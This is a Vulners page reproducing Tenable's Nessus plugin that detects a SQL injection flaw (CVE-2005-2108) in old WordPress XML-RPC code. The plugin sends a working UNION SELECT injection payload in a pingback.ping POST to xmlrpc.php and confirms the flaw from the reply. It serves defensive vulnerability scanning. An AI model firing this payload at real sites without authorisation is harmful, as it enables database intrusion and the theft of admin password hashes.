Lucene search

K

WordPress < 1.5.1.3 XMLRPC SQL Injection

🗓️ 01 Jul 2005 00:00:00Reported by This script is Copyright (C) 2005-2024 Tenable Network Security, Inc.Type 
nessus
 nessus
🔗 www.tenable.com👁 45 Views

The remote WordPress version < 1.5.1.3 is vulnerable to XMLRPC SQL injection attack, allowing disclosure of admin password hash or database attacks

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2005-2108
5 Jul 200504:00
nvd
Patchstack
WordPress <= 1.5.1.2 - SQL injection
1 Jul 200500:00
patchstack
WPVulnDB
WordPress <= 1.5.1.2 - XMLRPC SQL Injection
3 Feb 201500:00
wpvulndb
UbuntuCve
CVE-2005-2108
5 Jul 200500:00
ubuntucve
Cvelist
CVE-2005-2108
1 Jul 200504:00
cvelist
Debian CVE
CVE-2005-2108
5 Jul 200504:00
debiancve
CVE
CVE-2005-2108
5 Jul 200504:00
cve
OpenVAS
FreeBSD Ports: wordpress
4 Sep 200800:00
openvas
OpenVAS
FreeBSD Ports: wordpress
4 Sep 200800:00
openvas
Tenable Nessus
FreeBSD : wordpress -- multiple vulnerabilities (dca0a345-ed81-11d9-8310-0001020eed82)
13 Jul 200500:00
nessus
Rows per page
#%NASL_MIN_LEVEL 70300
#
# Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(18601);
  script_version("1.30");
  script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");

  script_cve_id("CVE-2005-2108");
  script_xref(name:"EDB-ID", value:"1077");

  script_name(english:"WordPress < 1.5.1.3 XMLRPC SQL Injection");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
SQL injection vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of WordPress installed on the remote host is affected by a
SQL injection vulnerability because the bundled XML-RPC library fails
to properly sanitize user-supplied input to the 'xmlrpc.php' script.
An attacker can exploit this flaw to launch SQL injection attacks that
could lead to disclosure of the administrator's password hash or
attacks against the underlying database.

Note that the application is reportedly also affected by multiple
cross-site scripting (XSS) vulnerabilities, multiple path disclosure
vulnerabilities, and a flaw in which a remote attacker can modify the
content of the 'forgotten password' message; however, Nessus has not
tested for these issues.");
  # http://web.archive.org/web/20051230035642/http://www.gulftech.org/?node=research&article_id=00085-06282005
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8ec4b624");
  script_set_attribute(attribute:"solution", value:
"Upgrade to WordPress version 1.5.1.3 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2005/06/29");
  script_set_attribute(attribute:"patch_publication_date", value:"2005/06/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/07/01");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2024 Tenable Network Security, Inc.");

  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

# Check whether the script exists.
r = http_send_recv3(method: "GET", item:dir + "/xmlrpc.php", port:port, exit_on_fail: TRUE);

# If it does...
if ("XML-RPC server accepts POST requests only" >< r[2])
{
  # Find an existing post.
  res = http_send_recv3(method : "GET", item:dir + "/index.php", port:port, exit_on_fail: TRUE);

  pat = '/\\?p=([0-9]+)" rel="bookmark"';
  matches = egrep(pattern:pat, string:res);
  if (matches)
  {
    foreach match (split(matches))
    {
      match = chomp(match);
      post = eregmatch(pattern:pat, string:match);
      if (!isnull(post))
      {
        post = post[1];
        # We're only interested in the first post we find.
        break;
      }
    }
  }

  # If we have a post, try to exploit the flaw.
  if (post)
  {
    postdata =
      '<?xml version="1.0"?>' +
      "<methodCall>" +
        "<methodName>pingback.ping</methodName>" +
          "<params>" +
            # nb: we can only determine success based on whether any
            #     rows were returned. The exploit used here, while
            #     lame, is certain to return one.
            # nb^2: this only works if the MySQL version supports
            #       UNION (ie, >= 4.0).
            "<param><value><string>" +SCRIPT_NAME+ "' UNION SELECT 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--</string></value></param>" +
            "<param><value><string>http://" +get_host_name()+ dir + "/?p=" +post+ "#1</string></value></param>" +
            "<param><value><string>admin</string></value></param>" +
          "</params>" +
        "</methodCall>";
    r = http_send_recv3(method: "POST", item: dir+"/xmlrpc.php", version: 11, port: port, exit_on_fail: TRUE, content_type: "text/xml", data: postdata);

    # There's a problem if we see "The pingback has already been registered".
    if ("The pingback has already been registered" >< r[2])
    {
      security_hole(port);
      set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
      security_hole(port);
      exit(0);
    }
  }
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Jul 2005 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS27.5
EPSS0.002
45
.json
Report